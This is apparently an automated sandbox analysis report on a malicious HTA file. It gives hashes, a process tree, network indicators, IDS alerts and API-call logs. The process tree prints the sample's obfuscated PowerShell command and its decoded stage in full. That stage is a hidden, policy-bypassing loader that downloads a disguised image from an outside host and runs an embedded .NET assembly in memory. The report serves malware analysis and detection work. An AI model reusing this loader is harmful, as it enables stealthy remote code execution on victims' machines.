Summary | ZeroBOX

lowkeeeeeFile.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 31, 2023, 5:44 p.m. Oct. 31, 2023, 5:46 p.m.
Size 132.8KB
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 393385547048586dc9eac0ba496b5c6a
SHA256 5aa1c237fc4d93153e43adbe194c6035ceb4aa15f6cafb3e3302306c84796db4
CRC32 6380092F
ssdeep 3072:E20ZewMWl1AEAmAMZqXPDXPQY4YcTYWY3ld5:KEB
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\lowkeeeeeFile.hta.html

    2692
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2692 CREDAT:145409

      2780
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        3004
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmlpaWlpaWlpaWlpaWtvbGRpb3JkLzQ3MS43My40NTIuNTgxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

          2452

Name Response Post-Analysis Lookup
imageupload.io 104.21.83.102
IP Address Status Action
185.196.8.176 Active Moloch
104.21.83.102 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49178 -> 104.21.83.102:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49178
104.21.83.102:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io b1:21:d8:81:60:0d:67:7c:14:72:94:30:ff:a0:2d:d7:b8:50:dd:46

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x0000000000000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000194930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492e60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492e60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493410
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493410
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493410
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000214b30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000214b30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000214b30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000214a50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000214a50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b492a70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4939c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4939c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4939c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bba40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bba40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bba40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bba40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bc3e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4bc3e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000274230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6f50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6f50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6c6fc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 1052672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000e60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000f60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000f60000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
